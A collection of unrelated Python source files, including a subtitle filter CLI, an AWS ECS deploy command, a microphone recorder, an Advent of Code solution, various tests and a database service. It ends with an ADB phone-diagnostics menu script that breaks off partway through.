import importlib
import logging
from . import _cli
log = logging.getLogger(__name__)
def _true(param):
"""Always returns true for matching functionality."""
return True
def _pass(param):
"""Always returns the given parameter for process functionality."""
return param
def match(subtitles, imports, func_match, func_process, lines):
"""
Passes each matching subtitle-content to a function.
:param subtitles: :py:class:`Subtitle` objects
:param imports: Modules to import in the context of the function.
:param str func_match: The function used to match lines.
:param str func_process: The function used to process subtitle content.
:param bool invert: Whether to only match lines that return False.
:param per_line: Whether to apply functions to each line of content
(as opposed to the whole content string).
:rtype: :term:`generator` of :py:class:`Subtitle` objects
"""
for import_name in imports:
real_import = importlib.import_module(import_name)
globals()[import_name] = real_import
# fmt: off
# Evaluate the each function
match_func = eval(func_match) if func_match else _true # nosec pylint: disable-msg=eval-used
process_func = eval(func_process) if func_process else _pass # nosec pylint: disable-msg=eval-used
# fmt: on
# Match and process each subtitle (or subtitle-line).
for subtitle in subtitles:
if lines:
matched_lines = [
line for line in subtitle.content.splitlines() if match_func(line)
]
processed_lines = [process_func(line) for line in matched_lines]
subtitle.content = "\n".join(processed_lines)
else:
if match_func(subtitle.content):
subtitle.content = process_func(subtitle.content)
else:
subtitle.content = ""
yield subtitle
def set_args():
examples = {
"Only include Chinese lines": "srt match -m hanzidentifier -fm hanzidentifier.has_chinese",
"Exclude all lines which only contain numbers": "srt match -fm 'lambda x: not x.isdigit()'",
"Strip HTML-like symbols from a subtitle": """srt match -m re -fp 'lambda sub: re.sub("<[^<]+?>", "", sub)'""",
}
parser = _cli.basic_parser(description=__doc__, examples=examples)
parser.add_argument("--match", "--fm", help="The function used to match lines.")
parser.add_argument("--process", "--fp", help="The function used to process lines.")
parser.add_argument(
"--module",
"-m",
help="modules to import in the function context",
action="append",
default=[],
)
parser.add_argument(
"--lines",
"-l",
help="Match the content of each subtitle-line, not each subtitle-content.",
action="store_true",
)
return parser.parse_args()
def main():
args = set_args()
logging.basicConfig(level=args.log_level)
_cli.set_basic_args(args)
matched_subs = match(args.input, args.module, args.match, args.process, args.lines)
output = _cli.compose_suggest_on_fail(matched_subs, strict=args.strict)
args.output.write(output)
if __name__ == "__main__": # pragma: no cover
main()
|
import sys
import click
from ..alias import AliasedGroup
from .. import core, display, exceptions
@click.group(cls=AliasedGroup, short_help='Create or update resources.', invoke_without_command=True)
@click.option('-f', '--file', 'file_path', type=click.Path(exists=True),
help="Select file or folder that contains the configuration to apply.")
@click.option('-t', '--template', 'template_path', type=click.Path(exists=True),
help="Select file or folder that contains the template configuration to apply.")
@click.option('-e', '--env', 'envs', multiple=True,
help="During update task-definition also update service.")
@click.option('--env-file', 'env_file', multiple=True,
help="During update task-definition also update service.")
@click.option('--dry-run', is_flag=True, default=False,
help="If true, only print the object that would be sent, without sending it")
@click.option('--deploy', is_flag=True, default=False,
help="During update task-definition also update service.")
@click.option('-c', '--cluster',
help="Specify cluster to execute command. Default usage cluster from context.")
@click.pass_context
def apply(ctx, file_path, template_path, dry_run, deploy, envs, env_file, cluster, **kwargs):
"""
\b
# Apply yaml file with service definition
cmd::ecsctl apply -f my-app/service.yaml
\b
# Apply yaml file with task definition
cmd::ecsctl apply -f my-app/task-definition.yaml
\b
# Apply yaml template with task definition and set variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env image=my-image -e tag=1.0.0
\b
# Apply yaml template with task definition and file with variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file dev.env
\b
# Apply yaml template with task definition and file with variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file common.env --env-file dev.env
\b
# Apply folder with configuration files
cmd::ecsctl apply -f my-app/
\b
# Apply yaml file with task definition and update service
cmd::ecsctl apply -f my-app/task-definition.yaml --deploy
\b
# Check yaml file with task definition
cmd::ecsctl apply -f my-app/task-definition.yaml --dry-run
"""
bw = ctx.obj['bw']
if not cluster:
cluster = ctx.obj['cluster']
if file_path and not template_path:
_type, f = 'file', core.FileLoader(file_path)
elif template_path and not file_path:
_type, f = 'template', core.FileLoaderTemplate(template_path, envs, env_file)
else:
click.echo(click.style(str('Usage only template or file to apply.'), fg='red'))
return
for doc in f.load():
object_type = core.ObjectType(cluster=cluster, item=doc)
tmpl = object_type.get_template()
click.echo(click.style(object_type.ID, fg='yellow'))
if dry_run:
tmpl.run_before(boto_wrapper=bw)
param = display.de_unicode(tmpl.to_request())
tmpl.run_after(param, boto_wrapper=bw)
click.echo(click.style(param, fg='blue'))
click.echo('\n')
else:
try:
resp = bw.apply_object(tmpl=tmpl, deploy=deploy)
except Exception as err:
click.echo(click.style(str(err), fg='red'))
sys.exit(1)
else:
click.echo(click.style(object_type.show_response(resp), fg="green"))
if resp.get('deploy'):
ID = 'Service: {}'.format(resp['deploy']['service']['serviceName'])
show_response = resp['deploy']['service']['serviceArn']
task_definition = resp['deploy']['service']['taskDefinition']
click.echo(click.style(ID, fg='yellow'))
click.echo(click.style('{} -> {}'.format(show_response, task_definition), fg="green"))
|
import pyaudio
import wave
import audioop
from collections import deque
import os
import urllib
import time
import math
import subprocess as sub
FLAC_CONV = 'flac -f' # We need a WAV to FLAC converter. flac is available
# on Linux
# Microphone stream config.
CHUNK = 1024 # CHUNKS of bytes to read each time from mic
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
THRESHOLD = 1000 # The threshold intensity that defines silence
# and noise signal (an int. lower than THRESHOLD is silence).
SILENCE_LIMIT = 3 # Silence limit in seconds. The max amount of seconds where
# only silence is recorded. When this time passes the
# recording finishes and the file is delivered.
PREV_AUDIO = 0.5 # Previous audio (in seconds) to prepend. When noise
# is detected, how much of previously recorded audio is
# prepended. This helps to prevent chopping the beggining
# of the phrase.
DURATION = 40 # Maximum chunk duration
rel = RATE/CHUNK
def audio_int(num_samples=50):
""" Gets average audio intensity of your mic sound. You can use it to get
average intensities while you're talking and/or silent. The average
is the avg of the 20% largest intensities recorded.
"""
print ("Getting intensity values from mic.")
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
values = [math.sqrt(abs(audioop.avg(stream.read(CHUNK), 4)))
for x in range(num_samples)]
values = sorted(values, reverse=True)
r = sum(values[:int(num_samples * 0.2)]) / int(num_samples * 0.2)
print (" Finished ")
print (" Average audio intensity is ", r)
stream.close()
p.terminate()
return r
def listen_for_speech(threshold=THRESHOLD, num_phrases=-1):
"""
Listens to Microphone, extracts phrases from it and sends it to
Google's TTS service and returns response. a "phrase" is sound
surrounded by silence (according to threshold). num_phrases controls
how many phrases to process before finishing the listening process
(-1 for infinite).
"""
# Open stream
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print ("* Listening to microphone... ")
audio2send = []
cur_data = '' # current chunk of audio data
slid_win = deque(maxlen = int(SILENCE_LIMIT * rel))
# Prepend audio from 0.5 seconds before noise was detected
prev_audio = deque(maxlen = int(PREV_AUDIO * rel))
started = False
n = num_phrases
response = []
while (num_phrases == -1 or n > 0):
cur_data = stream.read(CHUNK)
slid_win.append(math.sqrt(abs(audioop.avg(cur_data, 4))))
#print slid_win[-1]
if(sum([x > THRESHOLD for x in slid_win]) > 0):
if(not started):
print (" Starting phrase recording")
started = True
audio2send.append(cur_data)
elif (started is True):
print (" Finished")
# The limit was reached, finish capture and deliver.
filename = save_speech(list(prev_audio) + audio2send, p)
# Send file to Google and get response
# r = stt_google_wav(filename)
# if num_phrases == -1:
# print ("Response", r)
# else:
# response.append(r)
# Remove temp file. Comment line to review.
# os.remove(filename)
# Reset all
started = False
slid_win = deque(maxlen = int(SILENCE_LIMIT * rel))
prev_audio = deque(maxlen = int(PREV_AUDIO * rel))
audio2send = []
n -= 1
print ("Listening ...")
else:
prev_audio.append(cur_data)
print ("* Done recording")
stream.close()
p.terminate()
return response
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def save_speech(data, p):
""" Saves mic data to temporary WAV file. Returns filename of saved
file """
data = b''.join(data)
output_folder = str(time.strftime('%d%m%Y'))
if os.path.exists(output_folder) == False:
os.mkdir(output_folder)
if os.path.exists(output_folder + "/" + "noise") == False:
os.mkdir(output_folder + "/" + "noise")
if len(data) > (rel * DURATION):
dur = int(32768 * DURATION)
print (len(data), dur)
dataset = chunks(data, dur)
# dataset = [data[i:i + dur] for i in range(0, len(data), dur)]
filenames = []
current_time = str(time.strftime('%H%M%S'))
for index, item in enumerate(dataset):
filename = current_time + '_' + str(index)
wf = wave.open(output_folder + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(item)
filenames.append(filename)
wf.close()
return filenames
else:
if len(data) < (rel * SILENCE_LIMIT + PREV_AUDIO * 1.5):
print("Audio too short, likely to be noise.")
filename = str(time.strftime('%H%M%S'))
wf = wave.open(output_folder + "/" + "noise" + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
else:
filename = str(time.strftime('%H%M%S'))
wf = wave.open(output_folder + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
return filename
if(__name__ == '__main__'):
audio_int() # To measure your mic levels
listen_for_speech() # listen to mic.
#print stt_google_wav('hello.flac') # translate audio file
|
import math
def tokenizePassports(inputList):
tempPassport = {}
passports = []
for row in inputList:
if len(row) > 0:
items = row.split(" ")
for item in items:
item = item.split(":")
tempPassport[item[0]] = item[1]
else:
passports.append(tempPassport)
tempPassport = {}
if len(tempPassport) > 0:
passports.append(tempPassport)
return passports
def validateByr(value):
try:
value = int(value)
except ValueError:
return False
if not (1920 <= value <= 2002):
return False
return True
def validateIyr(value):
try:
value = int(value)
except ValueError:
return False
if not (2010 <= value <= 2020):
return False
return True
def validateEyr(value):
try:
value = int(value)
except ValueError:
return False
if not (2020 <= value <= 2030):
return False
return True
def validateHgt(value):
height = value[:-2]
unit = value[-2:]
if unit not in ["in", "cm"]:
return False
try:
height = int(height)
except ValueError:
return False
if unit == "cm":
if not (150 <= height <= 193):
return False
else:
if not (59 <= height <= 76):
return False
return True
def validateHcl(value):
if value[0] != "#":
return False
if len(value) != 7:
return False
try:
int(value[1:], 16)
except ValueError:
return False
return True
def validateEcl(value):
if value not in ["amb","blu","brn","gry","grn","hzl","oth"]:
return False
return True
def validatePid(value):
if len(value) != 9:
return False
return True
def validateField(key, value):
switch = {
"byr": validateByr,
"iyr": validateIyr,
"eyr": validateEyr,
"hgt": validateHgt,
"hcl": validateHcl,
"ecl": validateEcl,
"pid": validatePid,
"cid": lambda value: True
}
return switch[key](value)
def validatePassport(passport):
for key in passport.keys():
if validateField(key, passport[key]):
continue
else:
print("[X] passport has wrong field {}: {}".format(key, passport[key]))
return False
return True
inputList = []
with open("./4/input.txt") as inputFile:
for line in inputFile:
line = line.replace("\n","")
inputList.append(line)
passports = tokenizePassports(inputList)
validPassports = 0
necessaryKeys = {"byr","iyr","eyr","hgt","hcl","ecl","pid"}
for passport in passports:
passportKeys = set(passport.keys())
if necessaryKeys.issubset(passportKeys):
if validatePassport(passport):
print("[O] passport with {} is valid".format(passportKeys))
validPassports += 1
continue
else:
print("[X] passport missing {}, {}".format(necessaryKeys.difference(passportKeys), passport))
print("the number of valid passports is {}".format(validPassports))
|
import asyncio
import logging
import os
import websockets
from fenix_pipeline import ConnectionClosed
from fenix_pipeline import RawDataSocket
from fenix_pipeline import SubscriptionTypes
from fenix_pipeline import Trade
log = logging.getLogger(__name__)
LOCAL_ONLY = os.environ.get('LOCAL_ONLY', 'true').lower() in ('t', 'true', '1')
API_KEY = os.environ.get('FENIX_API_KEY')
LOG_LEVEL = os.environ.get('LOG_LEVEL', 'debug')
RUN_DURATION = int(os.environ.get('DURATION', 3))
SUBSCRIPTIONS = os.environ.get('SUBSCRIPTIONS', 'trades_by_market:btc-usdt')
async def test_socket_lifecycle(event_loop):
subscriptions = [_get_subscription_parts(s) for s in SUBSCRIPTIONS.split('/')]
socket = RawDataSocket(API_KEY, event_loop=event_loop)
if LOCAL_ONLY:
socket.uri = 'ws://localhost:8765'
message_emitter = None
try:
log.info('starting receiver')
async with await socket.connect(print_messages) as subscriber:
log.info('subscribing')
for subscription in subscriptions:
await subscriber.subscribe(*subscription)
await subscriber.monitor(RUN_DURATION)
log.info('unsubscribing')
for subscription in subscriptions:
await subscriber.unsubscribe(*subscription)
except ConnectionClosed:
log.info('socket closed, exiting lifecycle loop')
finally:
if message_emitter and not message_emitter.done():
log.info('awaiting message emit task')
await asyncio.gather(message_emitter)
def _get_subscription_parts(subscription):
values = subscription.split(':')
return SubscriptionTypes[values[0].upper()], values[1] if values[1] else None
async def simple_sample(event_loop):
# read the API key from a local environment variable called `FENIX_API_KEY`
socket = RawDataSocket(os.environ.get('FENIX_API_KEY'))
# using a context manager
async with await socket.connect(message_handler=print_messages) as subscriber:
# subscribe to the `btc-usdt` stream
await subscriber.subscribe(
SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
# just receive messages for the next 10 seconds
await subscriber.monitor(10)
# unsubscribe from the `btc-usdt` stream
await subscriber.unsubscribe(
SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
# done
async def test_channel_to_all_state_transitions(event_loop):
socket = RawDataSocket(API_KEY, event_loop=event_loop)
if LOCAL_ONLY:
socket.uri = 'ws://localhost:8765'
async with await socket.connect(message_handler=print_messages) as subscriber:
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdu')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdv')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.ALL_TRADES, None)
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
await subscriber.unsubscribe(SubscriptionTypes.ALL_TRADES, None)
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
async def print_messages(item):
if isinstance(item, Trade):
log.info('received: %r', item)
else:
log.info('other message: %s', item)
if __name__ == '__main__':
logging.getLogger().addHandler(logging.StreamHandler())
log_level = getattr(logging, LOG_LEVEL.upper())
logging.getLogger('fenix').setLevel(log_level)
log.setLevel(log_level)
event_loop = asyncio.get_event_loop()
event_loop.run_until_complete(test_socket_lifecycle(event_loop))
|
# Generated by Django 3.0.7 on 2020-06-18 05:56
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('problem', '0008_auto_20200618_1347'),
]
operations = [
migrations.AlterModelOptions(
name='problem',
options={'permissions': (('edit', 'Can edit problem'), ('remove', 'Can delete problem'),
('view_hidden', 'Can view hidden problem'))},
),
]
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from datetime import datetime
import json
import mock
from google.appengine.ext import ndb
import webapp2
from gae_libs.testcase import TestCase
from handlers import collect_tree_closures
from model.tree_closure import TreeClosure
from model.tree_closure import TreeStatus
class CollectTreeClosuresTest(TestCase):
app_module = webapp2.WSGIApplication(
[
('/collect-tree-closures', collect_tree_closures.CollectTreeClosures),
],
debug=True)
def testGetCurrentCheckingPointForTreeWithoutExistingData(self):
self.MockUTCNow(datetime(2017, 04, 13, 10, 10, 10))
expected_checking_point = datetime(2017, 01, 13, 10, 10, 10)
checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c')
self.assertEqual(expected_checking_point, checking_point)
def testGetCurrentCheckingPointForTreeWithExistingData(self):
TreeClosure(tree_name='c', closed_time=datetime(2017, 04, 10, 10, 10)).put()
TreeClosure(
tree_name='c',
closed_time=datetime(2017, 04, 11, 05, 05),
opened_time=datetime(2017, 04, 11, 05, 15)).put()
expected_checking_point = datetime(2017, 04, 11, 05, 15)
checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c')
self.assertEqual(expected_checking_point, checking_point)
@mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get')
def testRetrieveTreeStatusSuccess(self, mocked_Get):
mocked_Get.side_effect = [(200,
json.dumps([{
'date': '2017-04-01 12:12:12',
'message': 'm1',
'general_state': 'open',
'username': 'test@chromium.org',
}, {
'date': '2017-04-01 12:12:12',
'message': 'm1',
'general_state': 'open',
'username': 'test@chromium.org',
}]), {})]
statuses = collect_tree_closures._RetrieveTreeStatus(
'chromium', datetime(2017, 03, 31))
self.assertEqual(1, len(statuses))
self.assertEqual(statuses[0].time, datetime(2017, 04, 01, 12, 12, 12))
self.assertEqual(statuses[0].message, 'm1')
self.assertEqual(statuses[0].state, 'open')
self.assertEqual(statuses[0].username, 'test@chromium.org')
mocked_Get.assert_called_once_with(
'https://chromium-status.appspot.com/allstatus',
params={
'limit': 1000,
'format': 'json',
'endTime': 1490918400,
})
@mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get')
def testRetrieveTreeStatusFailure(self, mocked_Get):
mocked_Get.side_effect = [(400, 'error', {})]
statuses = collect_tree_closures._RetrieveTreeStatus(
'chromium', datetime(2017, 03, 31), end_time=datetime(2017, 04, 01))
self.assertEqual(0, len(statuses))
mocked_Get.assert_called_once_with(
'https://chromium-status.appspot.com/allstatus',
params={
'limit': 1000,
'format': 'json',
'endTime': 1490918400,
'startTime': 1491004800,
})
def testExtractFailureInfoWithFullBuildLink(self):
message = ('Tree is closed (Automatic: "compile" on '
'http://build.chromium.org/p/m/builders/b/builds/1 "b" from ...')
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual(('m', 'b', '1', 'compile'), info)
def testExtractFailureInfoWithPartialBuildLink(self):
message = ('Tree is closed (Automatic: "compile" on '
'/builders/b/builds/1 "b" from ...')
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual((None, 'b', '1', 'compile'), info)
def testExtractFailureInfoWithUnknownMessageFormat(self):
message = 'Tree is closed for blink rename'
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual((None, None, None, None), info)
def testDetectTreeClosureForTreeWithOneCompleteClosure(self):
all_statuses = [
TreeStatus(state='open'),
# A complete closure.
TreeStatus(
time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400.
message=('Tree is closed (Automatic: "compile" on '
'/builders/Win%20x64/builds/10327 "Win x64" from blabla'),
state='closed',
username='buildbot@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 1, 0),
message='Tree is closed (sheriff investigating)',
state='closed',
username='test@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 5, 0),
message='possible flake',
state='open',
username='test@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 15, 0),
message='speculative Reverted r12345678',
state='open',
username='test@chromium.org',
),
# An incomplete closure.
TreeStatus(state='closed')
]
num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses)
self.assertEqual(1, num)
key_str_id = '%s-%s' % ('c', 1490918400)
closure = ndb.Key(TreeClosure, key_str_id).get()
self.assertIsNotNone(closure)
self.assertEqual('c', closure.tree_name)
self.assertEqual(all_statuses[1:-1], closure.statuses)
self.assertEqual(datetime(2017, 03, 31, 0, 0, 0), closure.closed_time)
self.assertEqual(datetime(2017, 03, 31, 0, 5, 0), closure.opened_time)
self.assertEqual(
datetime(2017, 03, 31, 0, 15, 0), closure.latest_action_time)
self.assertTrue(closure.auto_closed)
self.assertFalse(closure.auto_opened)
self.assertTrue(closure.possible_flake)
self.assertTrue(closure.has_revert)
self.assertIsNone(closure.master_name)
self.assertEqual('Win x64', closure.builder_name)
self.assertEqual('10327', closure.build_id)
self.assertEqual('compile', closure.step_name)
def testDetectTreeClosureForTreeWithIncompleteClosure(self):
all_statuses = [
# A incomplete closure.
TreeStatus(
time=datetime(2017, 03, 31, 0, 0, 0), # timestamp is 1490918400.
message=('Tree is closed (Automatic: "compile" on '
'/builders/Win%20x64/builds/10327 "Win x64" from blabla'),
state='closed',
username='buildbot@chromium.org',
),
TreeStatus(
time=datetime(2017, 03, 31, 0, 15, 0),
message='possible flake',
state='open',
username='test@chromium.org',
),
]
num = collect_tree_closures._DetectTreeClosureForTree('c', all_statuses)
self.assertEqual(0, num)
key_str_id = '%s-%s' % ('c', 1490918400)
closure = ndb.Key(TreeClosure, key_str_id).get()
self.assertIsNone(closure)
@mock.patch.object(
collect_tree_closures,
'_GetCurrentCheckingPointForTree',
return_value=datetime(2017, 03, 01))
@mock.patch.object(
collect_tree_closures, '_RetrieveTreeStatus', return_value=['a'])
@mock.patch.object(
collect_tree_closures, '_DetectTreeClosureForTree', return_value=2)
def testGetWithStartTimeAndEndTime(self, mocked_detect_fun,
mocked_retrive_fun, mocked_check_fun):
response = self.test_app.get(
'/collect-tree-closures',
params={'start_time': '2017-04-01',
'end_time': '2017-04-05'},
headers={
'X-AppEngine-Cron': 'true'
})
self.assertEquals(200, response.status_int)
expected_result = {'chromium': 2}
self.assertEqual(expected_result, response.json_body)
self.assertFalse(mocked_check_fun.called)
mocked_retrive_fun.assert_called_once_with(
'chromium', datetime(2017, 04, 01), end_time=datetime(2017, 04, 05))
mocked_detect_fun.assert_called_once_with('chromium', ['a'])
@mock.patch.object(
collect_tree_closures,
'_GetCurrentCheckingPointForTree',
return_value=datetime(2017, 04, 01))
@mock.patch.object(
collect_tree_closures, '_RetrieveTreeStatus', return_value=['a'])
@mock.patch.object(
collect_tree_closures, '_DetectTreeClosureForTree', return_value=2)
def testGetWithoutStartTime(self, mocked_detect_fun, mocked_retrive_fun,
mocked_check_fun):
response = self.test_app.get(
'/collect-tree-closures', headers={
'X-AppEngine-Cron': 'true'
})
self.assertEquals(200, response.status_int)
expected_result = {'chromium': 2}
self.assertEqual(expected_result, response.json_body)
mocked_check_fun.assert_called_once_with('chromium')
mocked_retrive_fun.assert_called_once_with(
'chromium', datetime(2017, 04, 01), end_time=None)
mocked_detect_fun.assert_called_once_with('chromium', ['a'])
|
from time import time
b = 5
c = 3
d = 2
initime = time()
for x in range(100000):
b = (c + d)%100
c= (b + d)%1000
d= (c + b + d)%500
b= (d - c)%150
fintime = time()
print("TIME: " + str(fintime - initime))
|
from typing import List
from sqlalchemy.exc import InvalidRequestError, OperationalError
from sqlalchemy.orm import sessionmaker, Session
from DTO.run_type_dto import RunTypeDto, create_run_type
from config.base import getSession
from utils.checkers import Checkers
try:
from entities.lst_run_type import LstRunType
except ImportError as error:
Checkers.print_exception_one_param(error)
class LstRunTypeService:
def __init__(self):
self.__session: Session = getSession()
self.__all_run_type = None
self.__run_type_by_id = None
def insert_run_type(self, run_type_insert: RunTypeDto):
try:
run_type_aux = LstRunType(
description_run_type=run_type_insert.description_run_type
)
self.__session.add(run_type_aux)
self.__session.commit()
if run_type_aux.id_run_type is not None:
print("RECORD INSERTED IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name,
run_type_aux.id_run_type))
else:
print(" THE RECORD OF TABLE '{}' HAS NOT BEEN INSERTED".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def update_run_type(self, id_run_type, description_run_type=None):
try:
run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type)
if Checkers.validate_int(id_run_type,
LstRunType.id_run_type.name) and run_type_before.id_run_type is not None:
self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \
.update({
LstRunType.description_run_type: Checkers.check_field_not_null(LstRunType.description_run_type,
description_run_type)
},
synchronize_session=False
)
self.__session.commit()
run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type)
if run_type_before.__dict__ != run_type_after.__dict__:
print(" RECORD UPDATED IN TABLE '{}' WITH ID '{}' ".format(LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' HAS NOT BEEN UPDATED".format(LstRunType.__tablename__.name))
else:
print(" THE RECORD OF TABLE '{}' COULD NOT BE UPDATED ".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def delete_run_type(self, id_run_type):
try:
run_type_before: RunTypeDto = self.get_run_type_by_id(id_run_type)
if Checkers.validate_int(id_run_type,
LstRunType.id_run_type.name) and run_type_before.id_run_type is not None:
self.__session.query(LstRunType).filter(LstRunType.id_run_type.like(id_run_type)) \
.delete(synchronize_session=False)
self.__session.commit()
run_type_after: RunTypeDto = self.get_run_type_by_id(id_run_type)
if run_type_before.id_run_type is not None and run_type_after.id_run_type is None:
print("RECORD DELETE IN TABLE '{}' WITH ID '{}'".format(LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' WITH ID '{}' HAS NOT BEEN DELETED BECAUSE IT DID NOT EXIST".format(
LstRunType.__tablename__.name,
id_run_type))
else:
print(" THE RECORD OF TABLE '{}' COULD NOT BE DELETED".format(LstRunType.__tablename__.name))
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
def get_all_run_type(self):
run_type_dto_list = []
try:
self.__all_run_type: List[RunTypeDto] = self.__session.query(LstRunType).all()
if len(self.__all_run_type) != 0:
for row in self.__all_run_type:
run_type_aux = create_run_type(
row.id_run_type,
row.description_run_type
)
run_type_dto_list.append(run_type_aux)
else:
Checkers.empty_list(LstRunType.__tablename__.name)
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
return run_type_dto_list
def get_run_type_by_id(self, id_run_type):
try:
self.__run_type_by_id: RunTypeDto = self.__session.query(LstRunType).filter(
LstRunType.id_run_type.like(id_run_type)).first()
if self.__run_type_by_id is not None:
return create_run_type(
self.__run_type_by_id.id_run_type,
self.__run_type_by_id.description_run_type
)
else:
Checkers.print_object_filter_null(LstRunType.id_run_type.name, str(id_run_type))
return create_run_type(None, None)
except (InvalidRequestError, NameError) as error_request:
Checkers.print_exception_one_param(error_request)
except OperationalError as error_request2:
Checkers.print_exception_two_params(error_request2.orig.args[1], error_request2.orig.args[0])
return create_run_type(None, None)
|
print("""
######### ######## # # ######## ############
# # # # # # # # #
# # # # # # # # #
######### ######## # # ######## ############
# # # # # # # # #
# # # # # # # # #
######### ######## # # # # # #
\n Made by @EBSSecurty
""")
print("www.ebubekirbastama.com"+"\n")
import subprocess
komutumprocess = 'adb.exe shell ps'
komutumls = 'adb.exe shell ls -all'
komutumnetstat = 'adb.exe shell netstat'
devicessinfoversion = 'adb.exe shell getprop'
log = 'adb.exe logcat -d > telefonlogları.txt'
bugreport='adb.exe bugreport > telefonBuglogları.txt'
sysdump='adb.exe shell dumpsys > telefonBütün_Bilgileri.txt'
packetdump='adb.exe shell dumpsys activity > Paketisimleri.txt'
memdump='adb.exe shell dumpsys meminfo > meminfo.txt'
memdumpdetayli='adb.exe shell dumpsys meminfo'
print("1-) Process Listeleme"+"\n"+"2-) Klasör ve Ayrıntıları Listeleme"+"\n"+"3-) Netstat Çalıştırma"+"\n"+"4-) Telefon Detaylı Versiyon Bilgileri"+"\n"+"5-) Telefon Logları Çıktı Al"
+"\n"+"6-) Telefon Bug Report Çıktı Al"+"\n"+"7-) Bütün Telefon Sistem Bilgileri(Wifi,batarya vb.)"+"\n"+"8-) Telefondaki Bütün Apk Paket İsimleri."
+"\n"+"9-) Telefon Memori Packet Bilgileri"+"\n"+"10-) Packet İsmine Göre Memoriden Bilgi Getir."
)
numara=input("Neyapmak İstersin..."+"?\n")
if numara == "1":
piey = subprocess.Popen(komutumprocess, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print(gelenveri)
elif numara == "2":
piey = subprocess.Popen(komutumls, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print(gelenveri)
elif numara == "3":
piey = subprocess.Popen(komutumnetstat, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print(gelenveri)
elif numara == "4":
piey = subprocess.Popen(devicessinfoversion, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print(gelenveri)
elif numara == "5":
piey = subprocess.Popen(log, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Loglar Başarılı Bir Şekilde Aktarıldı.")
elif numara == "6":
print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...")
piey = subprocess.Popen(bugreport, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Loglar Başarılı Bir Şekilde Aktarıldı.")
elif numara == "7":
print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...")
